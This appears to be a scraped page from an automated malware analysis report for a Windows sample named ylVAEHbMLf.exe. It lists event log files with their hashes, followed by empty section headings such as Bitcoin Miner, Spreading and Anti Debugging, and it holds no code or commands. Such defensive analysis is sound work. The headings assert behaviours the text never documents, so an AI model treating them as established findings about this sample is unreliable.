C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	data	B0FBC2B8844E976AB0EBCB791A2FC647	CDFDA89EB07BEC719AAC75B9DC2FB31071F7DCE8	20FFEB7CE7F39CCF55B4838D6AA69BE4C0E915DB9A913592A3AA85764284EB71
C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx	data	B0BF4D9EC91ABBDA5D328631B125A5C0	E672D69127AE7C1A51046ADAA911871EC0C10ABB	8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx	data	E3FB1708C64D250E4D801AFB8688DF35	8B889F0358683733257411E451A86E3A1D42159D	0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx	data	BC10D6D62B90B1D14E5E4388835CB495	0E58368171408695F4050FF04DA21A9F4CFF1BDB	5573104124A4D0D76C40E381183DE85569C14D0DA44F7384F194BD2B4E4F2F12
C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx	data	FBD04DC07D03AA33DD161EDCD79EEBB2	24E531688AB034EF77086879222202CD3BBF0EF5	5C1A628B639346A80CABA7F8321C89F6F22106102ABF5E7184421A5E67477FF4
C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx	data	2045FB0D54CA8F456B545859B9F9B0A8	35854F87588C367DE32A3931E01BC71535E3F400	E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx	data	1AB19FA472669F4334C7A9D44E94E1B3	F71C16706CFA9930045C9A888FDB3EF46CACC5BC	549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx	data	7BCA54AC75C7185ADFBB42B1A84F86E3	AD91EE55A6F9F77AD871ACA9A5B59987CA679968	A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx	data	B6B6F199DA64422984403D7374F32528	980D66401DFCCF96ADDDAF22334A5CE735554E7F	8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	data	4140628CA3CEC29C0B506CEEBDF684F6	A2B70496C8E91D8E78AA04976B25D850ABAC6E1C	1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx	data	D7EECF043241FDB9486580582E208603	045D5672A8E9884B78CD31C52D372375503CBF4F	6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx	data	D1DEEB543797B5593601E7E484D510D9	339260952CECAA5533A104AFD555AEC8E5E68998	4A595EA63B1D5DFD2222FD0E7B3147A6665C32F2DAEBA902583105A4A4B2580B
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY	27689044C17827F377D9272DE60F385E	F2F1AD0E97CDF652DDD113D075026E0235F61D3C	2A6658A95CB5DB69D5ECEFEC6EF8A9D216E5A5C98DFD3CE41F3366ACC7516298
C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx	data	91374FAFBCE65CC199141B9E828F43F4	9A6658CF416BC5B79191DE3501DF34D13F460307	9C657F7E1A2A352629E5C0DEC63D2EC7827EA13446BAFF70E16C0D5B07465DDD
C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx	data	FC81D9FBA555C6BC7223594B8F6B46DE	971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C	9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx	data	CBD26A0BFB1B17BC56759F9B16C969FB	A5830EC36FF48806E2C2FDA2346EA4F6E6B7C77E	A5621C687F79A765371D1EE90DAA61DE6DC0A9520AC9011E48BF39D70841964A
C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx	data	6237EE0458A0478242B975E9BB7AA97D	6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1	C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx	data	D13189B45679E53F5744A4D449F8B00F	ED410CAB42772E329F656B4793B46AC7159CF05B	BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx	data	55E73A924B170FBFFF862E8E195E839A	3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0	1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx	data	E6ABB66EF952A2C26E0AB66E4E3E35FF	761DAFD03BF6DCE6C1F3C9AC9FFFDC85ECB58883	4381ABB52467795F4B0F18797EB03B4A7C6FEEF0C2CCA650BD3BD887D9AE68FA
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx	data	C37372EB51AEDB4552CB839C7294403A	7B7C408D72B084CE36AA6B623AC6B907FD21D569	C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx	data	3365A34953FD7B16667108A049B64DA5	C72421A58E063D64072152344B266F8306A78702	AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx	data	2D7BA746B746412B8DC92CB5B4BBA9FC	09C734B48CA58449652D0274D1E5E6E3ACE7C8F2	3DB4D70EB057F3C6DF34CE4D0AB398CC975E38A9DF507826B1E26A88CF438F78
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx	data	67CAD90771EBC0BD20736201D89C1586	EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7	7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
C:\Windows\System32\winevt\Logs\Security.evtx	data	340D78EED0ECC6DD7BCFC8FE1624A946	31E6AE9106F0A00A0D42DB71D3331CC95C8A62A8	3E9BB35C7D7A3586EDBC56F7FB8BA29F5E46E34A359FDE5814D9F4FE592B5E63
C:\Windows\System32\winevt\Logs\System.evtx	data	62E6754A55794985CB88475E0CCB509E	709022A63C7CE2D01994F22F0CD2DD79C6DB0531	EDB9546522D6C06224BB9D7E7D44C5227F230EBC5757F429F60D59D0BD80510B
C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx	data	A378329B10461167D49006D4B13E924E	82964E5AF7A1B3D60AA10AA642C94E9A95290835	2484C8381B929605988BC2E6FFA35A858A18846B978C85AF1A53F98F380D7482

Windows Analysis Report ylVAEHbMLf.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report
ylVAEHbMLf.exe

Malware Threat Intel
Provided by